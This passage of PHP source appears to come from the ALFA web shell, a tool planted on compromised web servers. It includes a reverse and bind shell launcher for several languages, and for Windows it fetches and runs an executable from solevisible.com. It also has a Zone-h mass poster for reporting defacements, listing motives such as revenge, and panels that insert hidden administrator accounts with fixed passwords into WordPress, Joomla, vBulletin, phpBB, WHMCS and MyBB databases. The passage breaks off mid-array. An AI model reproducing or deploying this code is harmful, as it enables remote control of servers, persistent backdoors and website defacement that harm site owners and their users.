0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";\r\necho "<div class=header><center><br><div class=\'txtfont_header\'>| Back Connect |</div><br><br>";\r\necho "<form onSubmit=\\"g(\'connect\',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\\">\r\n<div class=\\"txtfont\\">Mehtod:</div> <select name=\'cbmethod\' onChange=\'ctlbc(this);\' style=\'width:120px;\'><option value=\'back\'>Reverse Shell</option><option value=\'bind\'>Bind Port</option></select> <div class=\\"txtfont\\">Use:</div> <select name=\'selectCb\'>";\r\n$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");\r\nforeach($cbArr as $key=>$val){echo("<option value=\'{$key}\' ".($GLOBALS[\'sys\']==\'win\'?\'selected\':\'\').">{$val}</option>");}\r\necho "</select> <div id=\'bcipAction\' style=\'display:inline-block;\'><div class=\\"txtfont\\">IP:</div> <input type=\'text\' style=\'text-align:center;\' name=\'server\' value=\'". $_SERVER[\'REMOTE_ADDR\'] ."\'></div> <div class=\\"txtfont\\">Port: </div> <input type=\'text\' size=\'5\' style=\'text-align:center;\' name=\'port\' value=\'2012\'> <input type=\'submit\' value=\' \'></form><p><div id=\'bcStatus\'><small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small></div></p></center></b></font><br>";\r\nif(isset($_POST[\'alfa1\'])&&!empty($_POST[\'alfa1\'])){\r\n$lang = $_POST[\'alfa1\'];\r\n$ip = $_POST[\'alfa2\'];\r\n$port = $_POST[\'alfa3\'];\r\n$arg = ($_POST[\'alfa4\']==\'bind\'?$port:$port.\' \'.$ip);\r\n$tmpdir = ALFA_TEMPDIR;\r\n$name = $tmpdir.\'/\'.$lang.uniqid().rand(1,99999);\r\n$allow = array(\'perl\',\'ruby\',\'python\',\'node\');\r\neval(\'$lan=$\'.$lang.\';\');\r\nif(in_array($lang,$allow)){\r\nif(__write_file($name,__get_resource($lan))){\r\nif(_alfa_can_runCommand(true,true)){\r\n$os = ($GLOBALS[\'sys\']!=\'win\')?\'1>/dev/null 2>&1 &\':\'\';\r\n$out = alfaEx("$lang $name $arg $os");\r\nif($out==\'\'){$out="<font color=\'green\'><center>[ Finished...! ]</center></font>";}\r\necho("<pre class=\'ml1\' style=\'margin-top:5px\'>{$out}</pre>");\r\n}\r\n}else{\r\necho("<pre class=ml1 style=\'margin-top:5px\'><font color=\'red\'><center>[ Failed...! ]</center></font></pre>");\r\n}\r\n}\r\nif($lang==\'java\'||$lang==\'c\'){\r\n$code = __get_resource($lan);\r\n$out = nl2br(bcinit($lang, $code,\'\',\'\'));\r\necho("<pre class=ml1 style=\'margin-top:5px\'><center>{$out}</center></pre>");\r\n}\r\nif($lang==\'bcwin\'){\r\n$alfa = new AlfaCURL();\r\n$s = $alfa->Send(\'http://solevisible.com/bc/windows.exe\');\r\n$tmpdir = ALFA_TEMPDIR;\r\n$f = @fopen($tmpdir.\'/bcwin.exe\',\'w+\');\r\n@fwrite($f, $s);\r\n@fclose($f);\r\n$out = alfaEx($tmpdir."/bcwin.exe ".$_POST[\'alfa2\']." ".$_POST[\'alfa3\']);\r\n}\r\nif($lang==\'php\'){\r\necho "<pre class=ml1 style=\'margin-top:5px\'>";\r\n$code = __get_resource($lan);\r\nif($code!==false){\r\n$code = "\\$target = \\"".$arg."\\";\\n".$code;\r\neval($code);\r\necho("<center><font color=\'green\'>[ Finished...! ]</font></center>");\r\n}\r\necho "</pre>";\r\n}\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfazoneh(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nif(!function_exists(\'curl_version\')){\r\necho "<pre class=ml1 style=\'margin-top:5px\'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";\r\n}\r\n$hackmode = array(\'known vulnerability (i.e. unpatched system)\',\'undisclosed (new) vulnerability\',\'configuration / admin. mistake\',\'brute force attack\',\'social engineering\',\'Web Server intrusion\',\'Web Server external module intrusion\',\'Mail Server intrusion\',\'FTP Server intrusion\',\'SSH Server intrusion\',\'Telnet Server intrusion\',\'RPC Server intrusion\',\'Shares misconfiguration\',\'Other Server intrusion\',\'SQL Injection\',\'URL Poisoning\',\'File Inclusion\',\'Other Web Application bug\',\'Remote administrative panel access bruteforcing\',\'Remote administrative panel access password guessing\',\'Remote administrative panel access social engineering\',\'Attack against administrator(password stealing/sniffing)\',\'Access credentials through Man In the Middle attack\',\'Remote service password guessing\',\'Remote service password bruteforce\',\'Rerouting after attacking the Firewall\',\'Rerouting after attacking the Router\',\'DNS attack through social engineering\',\'DNS attack through cache poisoning\',\'Not available\',\'Cross-Site Scripting\');\r\n$reason = array(\'Heh...just for fun!\',\'Revenge against that website\',\'Political reasons\',\'As a challenge\',\'I just want to be the best defacer\',\'Patriotism\',\'Not available\');\r\necho \'\r\n<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>\r\n<form action="" method="post" onsubmit="g(\\\'zoneh\\\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\\\'>>\\\'); return false;">\r\n<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />\r\n<br>\r\n<select id="text" name="hackmode" style="width:400px;">\';\r\n$x=1;\r\nforeach($hackmode as $mode){echo(\'<option style="background-color: rgb(F, F, F);" value="\'.$x.\'">\'.$mode.\'</option>\');$x++;}\r\necho \'</select><br><select id="text" name="reason" style="width:200px;">\';\r\n$x=1;\r\nforeach($reason as $mode){echo(\'<option style="background-color: rgb(F, F, F);" value="\'.$x.\'">\'.$mode.\'</option>\');$x++;}\r\necho \'</select><br>\r\n<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>\r\n<p><input type="submit" value=" " name="go" /></p>\r\n</form></center>\';\r\nif($_POST[\'alfa5\'] && $_POST[\'alfa5\'] == \'>>\'){\r\nob_start();\r\n$hacker = $_POST[\'alfa1\'];\r\n$method = $_POST[\'alfa2\'];\r\n$neden = $_POST[\'alfa3\'];\r\n$site = $_POST[\'alfa4\'];\r\nif(empty($hacker)){\r\ndie (__pre()."<center><b><font color =\\"#FF0000\\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");\r\n}elseif($method == "------------------------------------SELECT-------------------------------------"){\r\ndie(__pre()."<center><b><font color =\\"#FF0000\\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");\r\n}elseif($neden == "------------------------------------SELECT-------------------------------------"){\r\ndie(__pre()."<center><b><font color =\\"#FF0000\\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");\r\n}elseif(empty($site)){\r\ndie(__pre()."<center><b><font color =\\"#FF0000\\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");\r\n}\r\n$i = 0;\r\n$sites = explode("\\n", $site);\r\n$alfa = new AlfaCURL();\r\nwhile($i < count($sites)){\r\nif(substr($sites[$i], 0, 4) != "http"){\r\n$sites[$i] = "http://".$sites[$i];\r\n}\r\n$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);\r\n++$i;\r\n}\r\necho __pre()."<center><font color =\\"#00A220\\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfapwchanger(){\r\nalfahead();\r\n\r\necho \'<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>\r\n<center><h3>\';\r\n$vals = array(\'WordPress\' => array(\'wp\',2),\'Joomla\' => array(\'joomla\',3),\'vBulletin\' => array(\'vb\',5),\'phpBB\' => array(\'phpbb\',6),\'WHMCS\' => array(\'whmcs\',7),\'MyBB\' => array(\'mybb\',8),\'Php Nuke\' => array(\'nuke\',9),\'Drupal\' => array(\'drupal\',10),\'SMF\' => array(\'smf\',11));\r\nAlfa_Create_A_Tag(\'pwchanger\',$vals);\r\necho \'</h3></center>\';\r\nif(isset($_POST[\'alfa1\'])&&$_POST[\'alfa1\']==\'wp\'){\r\n\r\necho __pre().\'<center><center><div class="txtfont_header">| WordPress |</div>\r\n<p>\'.getConfigHtml(\'wp\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'wp\\\',\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\',\'id\'=>\'db_host\', \'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'wp_\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'kh\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form>\';\r\nif ($_POST[\'alfa2\'] && $_POST[\'alfa2\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa3\'];\r\n$database = $_POST[\'alfa4\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,\'$admin\',\'d4a590caacc0be55ef286e40a945ea45\',\'$SQL\')") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login=\'".$admin."\'") or die(mysqli_error($conn));\r\n$sole = @mysqli_num_rows($solevisible);\r\nif ($sole == 1){\r\n$solevis = @mysqli_fetch_assoc($solevisible);\r\n$res = $solevis[\'ID\'];\r\n}\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,\'".$res."\',\'first_name\',\'solevisible\'),(null,\'".$res."\',\'last_name\',\'solevisible\'),(null,\'".$res."\',\'nickname\',\'solevisible\'),(null,\'".$res."\',\'description\',\'solevisible\'),(null,\'".$res."\',\'rich_editing\',\'true\'),(null,\'".$res."\',\'comment_shortcuts\',\'false\'),(null,\'".$res."\',\'admin_color\',\'fresh\'),(null,\'".$res."\',\'use_ssl\',\'0\'),(null,\'".$res."\',\'show_admin_bar_front\',\'true\'),(null,\'".$res."\',\'".$prefix."capabilities\',\'a:1:{s:13:\\"administrator\\";b:1;}\'),(null,\'".$res."\',\'".$prefix."user_level\',\'10\'),(null,\'".$res."\',\'show_welcome_panel\',\'1\'),(null,\'".$res."\',\'".$prefix."dashboard_quick_press_last_post_id\',\'3\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif($_POST[\'alfa2\'] && $_POST[\'alfa2\'] == \'joomla\'){\r\n\r\necho __pre().\'<center><center><div class="txtfont_header">| Joomla |</div><p><p>\'.getConfigHtml(\'joomla\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',\\\'joomla\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'jos_\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa3\'];\r\n$database = $_POST[\'alfa4\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,\'Super User\',\'".$admin."\',\'".$SQL."\',\'d4a590caacc0be55ef286e40a945ea45\')") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username=\'".$admin."\'") or die(mysqli_error($conn));\r\n$sole =@mysqli_num_rows($solevisible);\r\nif ($sole == 1){\r\n$solevis =@mysqli_fetch_assoc($solevisible);\r\n$res = $solevis[\'id\'];\r\n}\r\n$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES (\'".$res."\', \'8\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif($_POST[\'alfa4\'] && $_POST[\'alfa4\'] == \'vb\'){\r\n\r\necho __pre().\'<center><center><div class="txtfont_header">| vBulletin |<div><p>\'.getConfigHtml(\'vb\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,\\\'vb\\\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'hi\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$prefix = $_POST[\'alfa7\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());\r\n$pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = \'{$prefix}user\' and column_name = \'password\' and table_schema = \'{$database}\'");\r\n$pw_col = @mysqli_num_rows($pw_col);\r\n$adm_perm = "16744444";\r\nif($pw_col > 0){\r\n$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,\'6\',\'$admin\',\'52e28b78f55641cd4618ad1a20f5fd5c\',\'Xw|IbGLhTQA-AwApVv>61y^(z]*<QN\',\'$SQL\',\'".date(\'Y-m-d\')."\',\'".time()."\')") or die(mysqli_error($conn));\r\n}else{\r\n$adm_perm = "2143256444";\r\n$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,\'6\',\'$admin\',\'\\$2y\\$10\\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq\',\'Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>\',\'$SQL\',\'".date(\'Y-m-d\')."\',\'".time()."\',\'blowfish:10\',\'1984-05-20\')") or die(mysqli_error($conn));\r\n}\r\n$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username=\'".$admin."\'") or die(mysqli_error($conn));\r\n$sole = mysqli_num_rows($solevisible);\r\nif($sole == 1){\r\n$solevis = mysqli_fetch_assoc($solevisible);\r\n$res = $solevis[\'userid\'];\r\n}\r\n$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values(\'".$res."\',\'".$adm_perm."\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif(isset($_POST[\'alfa5\']) && $_POST[\'alfa5\'] == \'phpbb\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| phpBB |</div><p><p>\'.getConfigHtml(\'phpbb\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,\\\'phpbb\\\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa4\'];\r\n$password = $_POST[\'alfa6\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$hash = md5(\'solevisible\');\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean =\'".$admin."\' WHERE username_clean = \'admin\'") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password =\'".$hash."\' WHERE username_clean = \'admin\'") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean =\'".$admin."\' WHERE user_type = 3") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password =\'".$hash."\' WHERE user_type = 3") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email =\'".$SQL."\' WHERE username_clean = \'admin\'") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');\r\n}\r\n}\r\n}\r\nif(isset($_POST[\'alfa6\']) && $_POST[\'alfa6\'] == \'whmcs\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| Whmcs |</div><p><p>\'.getConfigHtml(\'whmcs\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,\\\'whmcs\\\',null,this.admin.value,this.email.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa4\'];\r\n$password = $_POST[\'alfa5\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,\'1\',\'".$admin."\',\'d4a590caacc0be55ef286e40a945ea45\',\'".$SQL."\',\'blend\',\'getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif(isset($_POST[\'alfa7\']) && $_POST[\'alfa7\'] == \'mybb\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| Mybb |</div><p><p>\'.getConfigHtml(\'mybb\').\'</p><form onsubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\\\'mybb\\\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => 